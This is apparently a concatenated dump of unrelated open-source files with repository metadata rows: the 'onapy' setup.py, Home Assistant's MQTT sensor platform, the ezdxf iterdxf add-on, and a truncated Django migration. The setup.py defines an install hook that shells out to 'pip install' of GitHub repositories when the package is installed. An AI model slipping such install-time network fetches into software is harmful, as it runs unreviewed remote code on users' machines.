    tm.assert_series_equal(series_result, series_expected)
| 33.122972
| 87
| 0.547529
|
4a0ea66000c8da72f003d6d7059e3781c2201689
| 1,482
|
py
|
Python
|
setup.py
|
xiong-jie-y/onapy
|
50b588d014dc24cd4876c784c8e69fba4eaf547e
|
[
"MIT"
] | 6
|
2021-03-23T14:44:33.000Z
|
2021-03-24T05:37:20.000Z
|
setup.py
|
xiong-jie-y/onapy
|
50b588d014dc24cd4876c784c8e69fba4eaf547e
|
[
"MIT"
] | null | null | null |
setup.py
|
xiong-jie-y/onapy
|
50b588d014dc24cd4876c784c8e69fba4eaf547e
|
[
"MIT"
] | null | null | null |
import os
import setuptools
import glob
__version__ = '0.0.1dev2'
def _parse_requirements(path):
with open(path) as f:
return [
line.rstrip()
for line in f
if not (line.isspace() or line.startswith('#'))
]
from setuptools.command.install import install
from subprocess import getoutput
class PostInstall(install):
    """Install command that additionally pip-installs git-hosted dependencies.

    These packages live only on GitHub, so they cannot be resolved from
    PyPI through ``install_requires`` and are installed afterwards.
    """
    # NOTE: the leading space in the first fragment is significant - both
    # fragments are concatenated onto one "pip install ..." command line.
    pkgs = ' git+https://github.com/xiong-jie-y/remimi.git'\
        ' git+https://github.com/xiong-jie-y/mmdetection.git'
    def run(self):
        install.run(self)
        # HACK: shells out to pip; a failure is only printed, never raised,
        # so a broken network leaves the install silently incomplete.
        print(getoutput('pip install'+self.pkgs))
# Runtime dependencies come from requirements.txt; echoed for install logs.
requirements = _parse_requirements('requirements.txt')
print(requirements)
setuptools.setup(
    name='onapy',
    version=__version__,
    url='https://github.com/xiong-jie-y/onapy',
    description='Onapy is the library to for next generation of masturbation.',
    author='xiong jie',
    author_email='fwvillage@gmail.com',
    long_description=open('README.md').read(),
    long_description_content_type='text/markdown',
    packages=setuptools.find_packages(),
    install_requires=requirements,
    license='MIT License',
    scripts=['scripts/recognize_onaho_motion', 'scripts/recognize_waist_motion'],
    keywords='perception,masturbation',
    # Ship bundled config files with every package.
    package_data={
        "": ["configs/*.*"]
    },
    # NOTE(review): dependency_links is ignored by modern pip (>=19);
    # the PostInstall command below is the actual install path for these.
    dependency_links=[
        'https://github.com/xiong-jie-y/remimi.git',
        'https://github.com/xiong-jie-y/mmdetection.git'
    ],
    cmdclass={'install': PostInstall}
)
| 29.058824
| 81
| 0.67004
|
4a0ea75de21da682e4c54c6dee33d31901145647
| 10,012
|
py
|
Python
|
homeassistant/components/mqtt/sensor.py
|
basicpail/core
|
5cc54618c5af3f75c08314bf2375cc7ac40d2b7e
|
[
"Apache-2.0"
] | null | null | null |
homeassistant/components/mqtt/sensor.py
|
basicpail/core
|
5cc54618c5af3f75c08314bf2375cc7ac40d2b7e
|
[
"Apache-2.0"
] | 21
|
2021-11-23T06:27:34.000Z
|
2022-03-31T06:24:13.000Z
|
homeassistant/components/mqtt/sensor.py
|
basicpail/core
|
5cc54618c5af3f75c08314bf2375cc7ac40d2b7e
|
[
"Apache-2.0"
] | null | null | null |
"""Support for MQTT sensors."""
from __future__ import annotations
from datetime import timedelta
import functools
import logging
import voluptuous as vol
from homeassistant.components import sensor
from homeassistant.components.sensor import (
DEVICE_CLASSES_SCHEMA,
STATE_CLASSES_SCHEMA,
SensorEntity,
)
from homeassistant.const import (
CONF_DEVICE_CLASS,
CONF_FORCE_UPDATE,
CONF_NAME,
CONF_UNIT_OF_MEASUREMENT,
CONF_VALUE_TEMPLATE,
)
from homeassistant.core import HomeAssistant, callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.event import async_track_point_in_utc_time
from homeassistant.helpers.reload import async_setup_reload_service
from homeassistant.helpers.typing import ConfigType
from homeassistant.util import dt as dt_util
from . import CONF_QOS, CONF_STATE_TOPIC, DOMAIN, PLATFORMS, subscription
from .. import mqtt
from .debug_info import log_messages
from .mixins import (
MQTT_ENTITY_COMMON_SCHEMA,
MqttAvailability,
MqttEntity,
async_setup_entry_helper,
)
_LOGGER = logging.getLogger(__name__)
# Configuration keys specific to MQTT sensors.
CONF_EXPIRE_AFTER = "expire_after"
CONF_LAST_RESET_TOPIC = "last_reset_topic"
CONF_LAST_RESET_VALUE_TEMPLATE = "last_reset_value_template"
CONF_STATE_CLASS = "state_class"
# Attributes managed by the entity itself and therefore blocked from being
# overridden through the JSON attributes topic.
MQTT_SENSOR_ATTRIBUTES_BLOCKED = frozenset(
    {
        sensor.ATTR_LAST_RESET,
        sensor.ATTR_STATE_CLASS,
    }
)
DEFAULT_NAME = "MQTT Sensor"
DEFAULT_FORCE_UPDATE = False
def validate_options(conf):
    """Warn about inconsistent last-reset options and return the config.

    If a last-reset topic is configured it must match the state topic,
    and a last-reset value template must accompany it. Violations only
    log a warning; the configuration is returned unchanged either way.
    """
    has_last_reset_topic = CONF_LAST_RESET_TOPIC in conf
    topics_differ = (
        has_last_reset_topic
        and CONF_STATE_TOPIC in conf
        and conf[CONF_LAST_RESET_TOPIC] != conf[CONF_STATE_TOPIC]
    )
    if topics_differ:
        _LOGGER.warning(
            "'%s' must be same as '%s'", CONF_LAST_RESET_TOPIC, CONF_STATE_TOPIC
        )
    if has_last_reset_topic and CONF_LAST_RESET_VALUE_TEMPLATE not in conf:
        _LOGGER.warning(
            "'%s' must be set if '%s' is set",
            CONF_LAST_RESET_VALUE_TEMPLATE,
            CONF_LAST_RESET_TOPIC,
        )
    return conf
# Discovery/YAML schema: extends the common read-only MQTT schema, warns on
# the deprecated last_reset_topic, and cross-checks options afterwards.
PLATFORM_SCHEMA = vol.All(
    cv.deprecated(CONF_LAST_RESET_TOPIC),
    mqtt.MQTT_RO_PLATFORM_SCHEMA.extend(
        {
            vol.Optional(CONF_DEVICE_CLASS): DEVICE_CLASSES_SCHEMA,
            vol.Optional(CONF_EXPIRE_AFTER): cv.positive_int,
            vol.Optional(CONF_FORCE_UPDATE, default=DEFAULT_FORCE_UPDATE): cv.boolean,
            vol.Optional(CONF_LAST_RESET_TOPIC): mqtt.valid_subscribe_topic,
            vol.Optional(CONF_LAST_RESET_VALUE_TEMPLATE): cv.template,
            vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
            vol.Optional(CONF_STATE_CLASS): STATE_CLASSES_SCHEMA,
            vol.Optional(CONF_UNIT_OF_MEASUREMENT): cv.string,
        }
    ).extend(MQTT_ENTITY_COMMON_SCHEMA.schema),
    validate_options,
)
async def async_setup_platform(
    hass: HomeAssistant, config: ConfigType, async_add_entities, discovery_info=None
):
    """Set up MQTT sensors through configuration.yaml."""
    # Register the reload service so YAML-configured sensors can be reloaded.
    await async_setup_reload_service(hass, DOMAIN, PLATFORMS)
    await _async_setup_entity(hass, async_add_entities, config)
async def async_setup_entry(hass, config_entry, async_add_entities):
    """Set up MQTT sensors dynamically through MQTT discovery."""
    # Bind the entity factory to this config entry; the helper validates
    # discovery payloads against PLATFORM_SCHEMA before calling it.
    setup = functools.partial(
        _async_setup_entity, hass, async_add_entities, config_entry=config_entry
    )
    await async_setup_entry_helper(hass, sensor.DOMAIN, setup, PLATFORM_SCHEMA)
async def _async_setup_entity(
    hass, async_add_entities, config: ConfigType, config_entry=None, discovery_data=None
):
    """Set up MQTT sensor."""
    # Shared creation path for both YAML and discovery setup.
    async_add_entities([MqttSensor(hass, config, config_entry, discovery_data)])
class MqttSensor(MqttEntity, SensorEntity):
    """Representation of a sensor that can be updated using MQTT."""
    # last_reset is only set when a last_reset topic/template is configured.
    _attr_last_reset = None
    _attributes_extra_blocked = MQTT_SENSOR_ATTRIBUTES_BLOCKED
    def __init__(self, hass, config, config_entry, discovery_data):
        """Initialize the sensor."""
        self._state = None
        self._expiration_trigger = None
        expire_after = config.get(CONF_EXPIRE_AFTER)
        # _expired is tri-state: True = expiry enabled and value stale,
        # False = expiry enabled and value fresh, None = expiry disabled.
        if expire_after is not None and expire_after > 0:
            self._expired = True
        else:
            self._expired = None
        MqttEntity.__init__(self, hass, config, config_entry, discovery_data)
    @staticmethod
    def config_schema():
        """Return the config schema."""
        return PLATFORM_SCHEMA
    def _setup_from_config(self, config):
        """(Re)Setup the entity."""
        # Attach hass to the templates so they can be rendered later.
        template = self._config.get(CONF_VALUE_TEMPLATE)
        if template is not None:
            template.hass = self.hass
        last_reset_template = self._config.get(CONF_LAST_RESET_VALUE_TEMPLATE)
        if last_reset_template is not None:
            last_reset_template.hass = self.hass
    async def _subscribe_topics(self):
        """(Re)Subscribe to topics."""
        topics = {}
        def _update_state(msg):
            # Render the incoming payload into self._state and (re)arm the
            # expiration timer when expire_after is configured.
            payload = msg.payload
            # auto-expire enabled?
            expire_after = self._config.get(CONF_EXPIRE_AFTER)
            if expire_after is not None and expire_after > 0:
                # When expire_after is set, and we receive a message, assume device is not expired since it has to be to receive the message
                self._expired = False
                # Reset old trigger
                if self._expiration_trigger:
                    self._expiration_trigger()
                    self._expiration_trigger = None
                # Set new trigger
                expiration_at = dt_util.utcnow() + timedelta(seconds=expire_after)
                self._expiration_trigger = async_track_point_in_utc_time(
                    self.hass, self._value_is_expired, expiration_at
                )
            template = self._config.get(CONF_VALUE_TEMPLATE)
            if template is not None:
                variables = {"entity_id": self.entity_id}
                # Previous state is passed as the template default value.
                payload = template.async_render_with_possible_json_value(
                    payload,
                    self._state,
                    variables=variables,
                )
            self._state = payload
        def _update_last_reset(msg):
            # Parse the payload (optionally through a template) into a
            # datetime for _attr_last_reset; invalid values only log.
            payload = msg.payload
            template = self._config.get(CONF_LAST_RESET_VALUE_TEMPLATE)
            if template is not None:
                variables = {"entity_id": self.entity_id}
                payload = template.async_render_with_possible_json_value(
                    payload,
                    self._state,
                    variables=variables,
                )
            if not payload:
                _LOGGER.debug("Ignoring empty last_reset message from '%s'", msg.topic)
                return
            try:
                last_reset = dt_util.parse_datetime(payload)
                if last_reset is None:
                    raise ValueError
                self._attr_last_reset = last_reset
            except ValueError:
                _LOGGER.warning(
                    "Invalid last_reset message '%s' from '%s'", msg.payload, msg.topic
                )
        @callback
        @log_messages(self.hass, self.entity_id)
        def message_received(msg):
            """Handle new MQTT messages."""
            _update_state(msg)
            # A state message also carries last_reset when a last_reset
            # template is set and no separate last_reset topic is used.
            if CONF_LAST_RESET_VALUE_TEMPLATE in self._config and (
                CONF_LAST_RESET_TOPIC not in self._config
                or self._config[CONF_LAST_RESET_TOPIC] == self._config[CONF_STATE_TOPIC]
            ):
                _update_last_reset(msg)
            self.async_write_ha_state()
        topics["state_topic"] = {
            "topic": self._config[CONF_STATE_TOPIC],
            "msg_callback": message_received,
            "qos": self._config[CONF_QOS],
        }
        @callback
        @log_messages(self.hass, self.entity_id)
        def last_reset_message_received(msg):
            """Handle new last_reset messages."""
            _update_last_reset(msg)
            self.async_write_ha_state()
        # Deprecated dedicated last_reset topic; only subscribed when it
        # differs from the state topic (otherwise handled above).
        if (
            CONF_LAST_RESET_TOPIC in self._config
            and self._config[CONF_LAST_RESET_TOPIC] != self._config[CONF_STATE_TOPIC]
        ):
            topics["last_reset_topic"] = {
                "topic": self._config[CONF_LAST_RESET_TOPIC],
                "msg_callback": last_reset_message_received,
                "qos": self._config[CONF_QOS],
            }
        self._sub_state = await subscription.async_subscribe_topics(
            self.hass, self._sub_state, topics
        )
    @callback
    def _value_is_expired(self, *_):
        """Triggered when value is expired."""
        self._expiration_trigger = None
        self._expired = True
        self.async_write_ha_state()
    @property
    def native_unit_of_measurement(self):
        """Return the unit this state is expressed in."""
        return self._config.get(CONF_UNIT_OF_MEASUREMENT)
    @property
    def force_update(self):
        """Force update."""
        return self._config[CONF_FORCE_UPDATE]
    @property
    def native_value(self):
        """Return the state of the entity."""
        return self._state
    @property
    def device_class(self) -> str | None:
        """Return the device class of the sensor."""
        return self._config.get(CONF_DEVICE_CLASS)
    @property
    def state_class(self) -> str | None:
        """Return the state class of the sensor."""
        return self._config.get(CONF_STATE_CLASS)
    @property
    def available(self) -> bool:
        """Return true if the device is available and value has not expired."""
        expire_after = self._config.get(CONF_EXPIRE_AFTER)
        # mypy doesn't know about fget: https://github.com/python/mypy/issues/6185
        return MqttAvailability.available.fget(self) and (  # type: ignore[attr-defined]
            expire_after is None or not self._expired
        )
| 34.170648
| 140
| 0.651119
|
4a0ea88087ba775d9f75b6776c9d204eb07f5298
| 16,816
|
py
|
Python
|
src/ezdxf/addons/iterdxf.py
|
jkjt/ezdxf
|
2acc5611b81476ea16b98063b9f55446a9182b81
|
[
"MIT"
] | 515
|
2017-01-25T05:46:52.000Z
|
2022-03-29T09:52:27.000Z
|
src/ezdxf/addons/iterdxf.py
|
jkjt/ezdxf
|
2acc5611b81476ea16b98063b9f55446a9182b81
|
[
"MIT"
] | 417
|
2017-01-25T10:01:17.000Z
|
2022-03-29T09:22:04.000Z
|
src/ezdxf/addons/iterdxf.py
|
jkjt/ezdxf
|
2acc5611b81476ea16b98063b9f55446a9182b81
|
[
"MIT"
] | 149
|
2017-02-01T15:52:02.000Z
|
2022-03-17T10:33:38.000Z
|
# Copyright (c) 2020-2021, Manfred Moitzi
# License: MIT License
from typing import (
Iterable,
Iterator,
cast,
BinaryIO,
Tuple,
Dict,
Optional,
List,
Set,
Union,
Any,
)
from io import StringIO
from pathlib import Path
from ezdxf.lldxf.const import DXFStructureError
from ezdxf.lldxf.extendedtags import ExtendedTags, DXFTag
from ezdxf.lldxf.tagwriter import TagWriter
from ezdxf.lldxf.tagger import tag_compiler, ascii_tags_loader
from ezdxf.filemanagement import dxf_file_info
from ezdxf.lldxf import fileindex
from ezdxf.entities import DXFGraphic, DXFEntity, Polyline, Insert
from ezdxf.entities import factory
from ezdxf.entities.subentity import entity_linker
from ezdxf.tools.codepage import toencoding
__all__ = ["opendxf", "single_pass_modelspace", "modelspace"]
# DXF entity types the iterators can load as DXFGraphic objects; any other
# type encountered in the ENTITIES section is skipped.
SUPPORTED_TYPES = {
    "ARC",
    "LINE",
    "CIRCLE",
    "ELLIPSE",
    "POINT",
    "LWPOLYLINE",
    "SPLINE",
    "3DFACE",
    "SOLID",
    "TRACE",
    "SHAPE",
    "POLYLINE",
    "VERTEX",
    "SEQEND",
    "MESH",
    "TEXT",
    "MTEXT",
    "HATCH",
    "INSERT",
    "ATTRIB",
    "ATTDEF",
    "RAY",
    "XLINE",
    "DIMENSION",
    "LEADER",
    "IMAGE",
    "WIPEOUT",
    "HELIX",
    "MLINE",
    "MLEADER",
}
Filename = Union[Path, str]
class IterDXF:
    """Iterator for DXF entities stored in the modelspace.
    Args:
        name: filename, has to be a seekable file.
        errors: specify decoding error handler
        - "surrogateescape" to preserve possible binary data (default)
        - "ignore" to use the replacement char U+FFFD "\ufffd" for invalid data
        - "strict" to raise an :class:`UnicodeDecodeError` exception for invalid data
    Raises:
        DXFStructureError: invalid or incomplete DXF file
        UnicodeDecodeError: if `errors` is "strict" and a decoding error occurs
    """
    def __init__(self, name: Filename, errors: str = "surrogateescape"):
        self.structure, self.sections = self._load_index(str(name))
        self.errors = errors
        # Kept open for the object's lifetime; entities are read lazily by
        # seeking to indexed file offsets. Call close() when done.
        self.file: BinaryIO = open(name, mode="rb")
        if "ENTITIES" not in self.sections:
            raise DXFStructureError("ENTITIES section not found.")
        if self.structure.version > "AC1009" and "OBJECTS" not in self.sections:
            raise DXFStructureError("OBJECTS section not found.")
    def _load_index(
        self, name: str
    ) -> Tuple[fileindex.FileStructure, Dict[str, int]]:
        # Build a slim index of (0, <type>) tags plus a mapping from section
        # name to its position in that index.
        structure = fileindex.load(name)
        sections: Dict[str, int] = dict()
        new_index = []
        for e in structure.index:
            if e.code == 0:
                new_index.append(e)
            elif e.code == 2:
                # Section name tag follows the (0, SECTION) tag, so it maps
                # to the index entry just appended.
                sections[e.value] = len(new_index) - 1
        # remove all other tags like handles (code == 5)
        structure.index = new_index
        return structure, sections
    @property
    def encoding(self):
        # Text encoding detected from the DXF header.
        return self.structure.encoding
    @property
    def dxfversion(self):
        # DXF version string, e.g. "AC1009" for R12.
        return self.structure.version
    def export(self, name: Filename) -> "IterDXFWriter":
        """Returns a companion object to export parts from the source DXF file
        into another DXF file, the new file will have the same HEADER, CLASSES,
        TABLES, BLOCKS and OBJECTS sections, which guarantees all necessary
        dependencies are present in the new file.
        Args:
            name: filename, no special requirements
        """
        doc = IterDXFWriter(name, self)
        # Copy everything from start of source DXF until the first entity
        # of the ENTITIES section to the new DXF.
        location = self.structure.index[self.sections["ENTITIES"] + 1].location
        self.file.seek(0)
        data = self.file.read(location)
        doc.write_data(data)
        return doc
    def copy_objects_section(self, f: BinaryIO) -> None:
        # Copy the raw bytes of the OBJECTS section (including its ENDSEC)
        # from the source file into `f`.
        start_index = self.sections["OBJECTS"]
        try:
            end_index = self.structure.get(0, "ENDSEC", start_index)
        except ValueError:
            raise DXFStructureError(f"ENDSEC of OBJECTS section not found.")
        start_location = self.structure.index[start_index].location
        end_location = self.structure.index[end_index + 1].location
        count = end_location - start_location
        self.file.seek(start_location)
        data = self.file.read(count)
        f.write(data)
    def modelspace(self, types: Iterable[str] = None) -> Iterable[DXFGraphic]:
        """Returns an iterator for all supported DXF entities in the
        modelspace. These entities are regular :class:`~ezdxf.entities.DXFGraphic`
        objects but without a valid document assigned. It is **not**
        possible to add these entities to other `ezdxf` documents.
        It is only possible to recreate the objects by factory functions base
        on attributes of the source entity.
        For MESH, POLYMESH and POLYFACE it is possible to use the
        :class:`~ezdxf.render.MeshTransformer` class to render (recreate) this
        objects as new entities in another document.
        Args:
            types: DXF types like ``['LINE', '3DFACE']`` which should be
                returned, ``None`` returns all supported types.
        """
        linked_entity = entity_linker()
        queued = None
        requested_types = _requested_types(types)
        for entity in self.load_entities(
            self.sections["ENTITIES"] + 1, requested_types
        ):
            if not linked_entity(entity) and entity.dxf.paperspace == 0:
                # queue one entity for collecting linked entities:
                # VERTEX, ATTRIB
                if queued:
                    yield queued
                queued = entity
        if queued:
            yield queued
    def load_entities(
        self, start: int, requested_types: Set[str]) -> Iterable[DXFGraphic]:
        # Walk index entries from `start` until ENDSEC; each entry's byte
        # span [entry.location, next_entry.location) is one entity.
        def to_str(data: bytes) -> str:
            return data.decode(self.encoding, errors=self.errors).replace(
                "\r\n", "\n"
            )
        index = start
        entry = self.structure.index[index]
        self.file.seek(entry.location)
        while entry.value != "ENDSEC":
            index += 1
            next_entry = self.structure.index[index]
            size = next_entry.location - entry.location
            # Read sequentially; the file position already matches.
            data = self.file.read(size)
            if entry.value in requested_types:
                xtags = ExtendedTags.from_text(to_str(data))
                yield factory.load(xtags)  # type: ignore
            entry = next_entry
    def close(self):
        """Safe closing source DXF file."""
        self.file.close()
class IterDXFWriter:
    """Writes entities selected from an :class:`IterDXF` source into a new
    DXF file; created via :meth:`IterDXF.export`, finalized by :meth:`close`.
    """
    def __init__(self, name: Filename, loader: IterDXF):
        self.name = str(name)
        # Output is binary; entity text is encoded with the loader's codec.
        self.file: BinaryIO = open(name, mode="wb")
        self.text = StringIO()
        self.entity_writer = TagWriter(self.text, loader.dxfversion)
        self.loader = loader
    def write_data(self, data: bytes):
        # Raw byte pass-through (header/classes/tables/blocks prefix).
        self.file.write(data)
    def write(self, entity: DXFGraphic):
        """Write a DXF entity from the source DXF file to the export file.
        Don't write entities from different documents than the source DXF file,
        dependencies and resources will not match, maybe it will work once, but
        not in a reliable way for different DXF documents.
        """
        # Not necessary to remove this dependencies by copying
        # them into the same document frame
        # ---------------------------------
        # remove all possible dependencies
        # entity.xdata = None
        # entity.appdata = None
        # entity.extension_dict = None
        # entity.reactors = None
        # reset text stream
        self.text.seek(0)
        self.text.truncate()
        if entity.dxf.handle is None:  # DXF R12 without handles
            self.entity_writer.write_handles = False
        entity.export_dxf(self.entity_writer)
        # Linked sub-entities must follow their owner in the output.
        if entity.dxftype() == "POLYLINE":
            polyline = cast(Polyline, entity)
            for vertex in polyline.vertices:
                vertex.export_dxf(self.entity_writer)
            polyline.seqend.export_dxf(self.entity_writer)  # type: ignore
        elif entity.dxftype() == "INSERT":
            insert = cast(Insert, entity)
            if insert.attribs_follow:
                for attrib in insert.attribs:
                    attrib.export_dxf(self.entity_writer)
                insert.seqend.export_dxf(self.entity_writer)  # type: ignore
        data = self.text.getvalue().encode(self.loader.encoding)
        self.file.write(data)
    def close(self):
        """Safe closing of exported DXF file. Copying of OBJECTS section
        happens only at closing the file, without closing the new DXF file is
        invalid.
        """
        self.file.write(b"  0\r\nENDSEC\r\n")  # for ENTITIES section
        if self.loader.dxfversion > "AC1009":
            self.loader.copy_objects_section(self.file)
        self.file.write(b"  0\r\nEOF\r\n")
        self.file.close()
def opendxf(filename: Filename, errors: str = "surrogateescape") -> IterDXF:
    """Open a seekable DXF file for entity iteration.

    No DXF structure checks are applied, so only feed in valid DXF files.
    Use this function to split up big DXF files as shown in the example
    above.

    Args:
        filename: DXF filename of a seekable DXF file.
        errors: decoding error handler; "surrogateescape" (default)
            preserves possible binary data, "ignore" replaces invalid
            data with the replacement char U+FFFD, and "strict" raises a
            :class:`UnicodeDecodeError` for invalid data.

    Raises:
        DXFStructureError: invalid or incomplete DXF file
        UnicodeDecodeError: if `errors` is "strict" and a decoding error
            occurs

    """
    return IterDXF(filename, errors=errors)
def modelspace(
    filename: Filename,
    types: Optional[Iterable[str]] = None,
    errors: str = "surrogateescape",
) -> Iterable[DXFGraphic]:
    """Iterate over all modelspace entities as :class:`DXFGraphic` objects of
    a seekable file.
    Use this function to iterate "quick" over modelspace entities of a DXF file,
    filtering DXF types may speed up things if many entity types will be skipped.
    Args:
        filename: filename of a seekable DXF file
        types: DXF types like ``['LINE', '3DFACE']`` which should be returned,
        ``None`` returns all supported types.
        errors: specify decoding error handler
        - "surrogateescape" to preserve possible binary data (default)
        - "ignore" to use the replacement char U+FFFD "\ufffd" for invalid data
        - "strict" to raise an :class:`UnicodeDecodeError` exception for invalid data
    Raises:
        DXFStructureError: invalid or incomplete DXF file
        UnicodeDecodeError: if `errors` is "strict" and a decoding error occurs
    """
    info = dxf_file_info(str(filename))
    # scanner state: previous tag (to detect "(0, SECTION) (2, name)" pairs)
    # and whether we are currently inside the ENTITIES section
    prev_code: int = -1
    prev_value: Any = ""
    entities = False
    requested_types = _requested_types(types)
    with open(filename, mode="rt", encoding=info.encoding, errors=errors) as fp:
        tagger = ascii_tags_loader(fp)
        # `queued` holds one finished entity back so trailing linked entities
        # (VERTEX, ATTRIB) can still be attached to it by entity_linker()
        queued: Optional[DXFEntity] = None
        # raw tags of the entity currently being collected
        tags: List[DXFTag] = []
        linked_entity = entity_linker()
        for tag in tag_compiler(tagger):
            code = tag.code
            value = tag.value
            if entities:
                if code == 0:
                    # group code 0 starts a new entity: load and maybe emit
                    # the previously collected one
                    if len(tags) and tags[0].value in requested_types:
                        entity = factory.load(ExtendedTags(tags))
                        # linked entities are consumed by linked_entity();
                        # only top-level modelspace (paperspace == 0)
                        # entities are yielded
                        if (
                            not linked_entity(entity)
                            and entity.dxf.paperspace == 0
                        ):
                            # queue one entity for collecting linked entities:
                            # VERTEX, ATTRIB
                            if queued:
                                yield queued  # type: ignore
                            queued = entity
                    tags = [tag]
                else:
                    tags.append(tag)
                if code == 0 and value == "ENDSEC":
                    # end of ENTITIES section: flush the queued entity
                    if queued:
                        yield queued  # type: ignore
                    return
                continue  # if entities - nothing else matters
            elif code == 2 and prev_code == 0 and prev_value == "SECTION":
                # section header "(0, SECTION) (2, name)": enter ENTITIES?
                entities = value == "ENTITIES"
            prev_code = code
            prev_value = value
def single_pass_modelspace(
    stream: BinaryIO,
    types: Optional[Iterable[str]] = None,
    errors: str = "surrogateescape",
) -> Iterable[DXFGraphic]:
    """Iterate over all modelspace entities as :class:`DXFGraphic` objects in
    one single pass.
    Use this function to 'quick' iterate over modelspace entities of a **not**
    seekable binary DXF stream, filtering DXF types may speed up things if many
    entity types will be skipped.
    Args:
        stream: (not seekable) binary DXF stream
        types: DXF types like ``['LINE', '3DFACE']`` which should be returned,
        ``None`` returns all supported types.
        errors: specify decoding error handler
        - "surrogateescape" to preserve possible binary data (default)
        - "ignore" to use the replacement char U+FFFD "\ufffd" for invalid data
        - "strict" to raise an :class:`UnicodeDecodeError` exception for invalid data
    Raises:
        DXFStructureError: Invalid or incomplete DXF file
        UnicodeDecodeError: if `errors` is "strict" and a decoding error occurs
    """
    # Phase 1: scan the leading HEADER section as raw bytes to pick up
    # $DWGCODEPAGE (text encoding) and $ACADVER (DXF version), stopping at
    # the header's ENDSEC or at the first non-HEADER section name.
    fetch_header_var: Optional[str] = None
    encoding = "cp1252"  # fallback if $DWGCODEPAGE is never seen
    version = "AC1009"  # fallback if $ACADVER is never seen
    prev_code: int = -1
    prev_value: str = ""
    entities = False
    requested_types = _requested_types(types)
    for code, value in binary_tagger(stream):
        if code == 0 and value == b"ENDSEC":
            break
        elif code == 2 and prev_code == 0 and value != b"HEADER":
            # (0, SECTION), (2, name)
            # First section is not the HEADER section
            entities = value == b"ENTITIES"
            break
        elif code == 9 and value == b"$DWGCODEPAGE":
            fetch_header_var = "ENCODING"
        elif code == 9 and value == b"$ACADVER":
            fetch_header_var = "VERSION"
        elif fetch_header_var == "ENCODING":
            encoding = toencoding(value.decode())
            fetch_header_var = None
        elif fetch_header_var == "VERSION":
            version = value.decode()
            fetch_header_var = None
        prev_code = code
    if version >= "AC1021":
        # files of version AC1021 and newer are decoded as UTF-8
        encoding = "utf-8"
    # Phase 2: compile tags with the detected encoding and yield entities;
    # same collection logic as modelspace() above.
    queued: Optional[DXFGraphic] = None
    tags: List[DXFTag] = []
    linked_entity = entity_linker()
    for tag in tag_compiler(binary_tagger(stream, encoding, errors)):
        code = tag.code
        value = tag.value
        if entities:
            if code == 0 and value == "ENDSEC":
                if queued:
                    yield queued
                return
            if code == 0:
                # group code 0 starts the next entity: emit the collected one
                if len(tags) and tags[0].value in requested_types:
                    entity = cast(DXFGraphic, factory.load(ExtendedTags(tags)))
                    if not linked_entity(entity) and entity.dxf.paperspace == 0:
                        # queue one entity for collecting linked entities:
                        # VERTEX, ATTRIB
                        if queued:
                            yield queued
                        queued = entity
                tags = [tag]
            else:
                tags.append(tag)
            continue  # if entities - nothing else matters
        elif code == 2 and prev_code == 0 and prev_value == "SECTION":
            entities = value == "ENTITIES"
        prev_code = code
        prev_value = value
def binary_tagger(
    file: BinaryIO, encoding: Optional[str] = None, errors: str = "surrogateescape"
) -> Iterator[DXFTag]:
    """Yield :class:`DXFTag` objects from a raw binary DXF stream.

    Reads alternating (group code, value) lines until reading from the
    stream raises ``IOError``. Values are decoded to ``str`` only when an
    `encoding` is given, otherwise raw ``bytes`` are yielded.

    Args:
        file: binary input stream
        encoding: text encoding for tag values, ``None`` keeps raw bytes
        errors: decoding error handler passed to ``bytes.decode``

    Raises:
        DXFStructureError: if a group code line is not a valid integer
    """
    while True:
        try:
            try:
                code = int(file.readline())
            except ValueError:
                # fix: was an f-string with no placeholders (pointless `f` prefix)
                raise DXFStructureError("Invalid group code")
            value = file.readline().rstrip(b"\r\n")
            yield DXFTag(
                code,
                value.decode(encoding, errors=errors) if encoding else value,
            )
        except IOError:
            return
def _requested_types(types: Optional[Iterable[str]]) -> Set[str]:
    """Map the user supplied type filter to the set of DXF types to load."""
    if not types:
        # no filter given: everything this module supports
        return SUPPORTED_TYPES
    selected = SUPPORTED_TYPES.intersection(set(types))
    # linked entities have to travel together with their owner entities
    if "POLYLINE" in selected:
        selected.update(("SEQEND", "VERTEX"))
    if "INSERT" in selected:
        selected.update(("SEQEND", "ATTRIB"))
    return selected
| 35.106472
| 89
| 0.596991
|
4a0ea897851d786d50a88ae4ee826b7010129e9e
| 3,011
|
py
|
Python
|
server/migrations/0078_auto_20180723_0936.py
|
lfaraone/sal
|
d0dff90cebcbc87f18c2c6957264f21566d52000
|
[
"Apache-2.0"
] | 1
|
2019-11-01T20:54:47.000Z
|
2019-11-01T20:54:47.000Z
|
server/migrations/0078_auto_20180723_0936.py
|
grahamgilbert/sal
|
d247ec1ea8855e65e5855b0dd63eae93b40f86ca
|
[
"Apache-2.0"
] | null | null | null |
server/migrations/0078_auto_20180723_0936.py
|
grahamgilbert/sal
|
d247ec1ea8855e65e5855b0dd63eae93b40f86ca
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2018-07-23 16:36
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django (see module header). Normalizes field options
    # on several `server` app models — mostly CharField(max_length=255) and
    # plain TextField definitions. Generated code: avoid hand-editing.
    dependencies = [
        ('server', '0077_friendlynamecache'),
    ]
    operations = [
        migrations.AlterField(
            model_name='apikey',
            name='private_key',
            field=models.CharField(max_length=255),
        ),
        migrations.AlterField(
            model_name='apikey',
            name='public_key',
            field=models.CharField(max_length=255),
        ),
        migrations.AlterField(
            model_name='condition',
            name='condition_data',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='condition',
            name='condition_name',
            field=models.CharField(max_length=255),
        ),
        migrations.AlterField(
            model_name='fact',
            name='fact_name',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='friendlynamecache',
            name='serial_stub',
            field=models.CharField(max_length=5),
        ),
        migrations.AlterField(
            model_name='historicalfact',
            name='fact_name',
            field=models.CharField(max_length=255),
        ),
        migrations.AlterField(
            model_name='historicalfact',
            name='fact_recorded',
            field=models.DateTimeField(),
        ),
        migrations.AlterField(
            model_name='installedupdate',
            name='update_version',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AlterField(
            model_name='pendingappleupdate',
            name='update_version',
            # NOTE(review): max_length=256 while sibling update_version fields
            # use 255 — matches the model state the generator saw; verify
            # this asymmetry is intentional.
            field=models.CharField(blank=True, max_length=256, null=True),
        ),
        migrations.AlterField(
            model_name='pendingupdate',
            name='update_version',
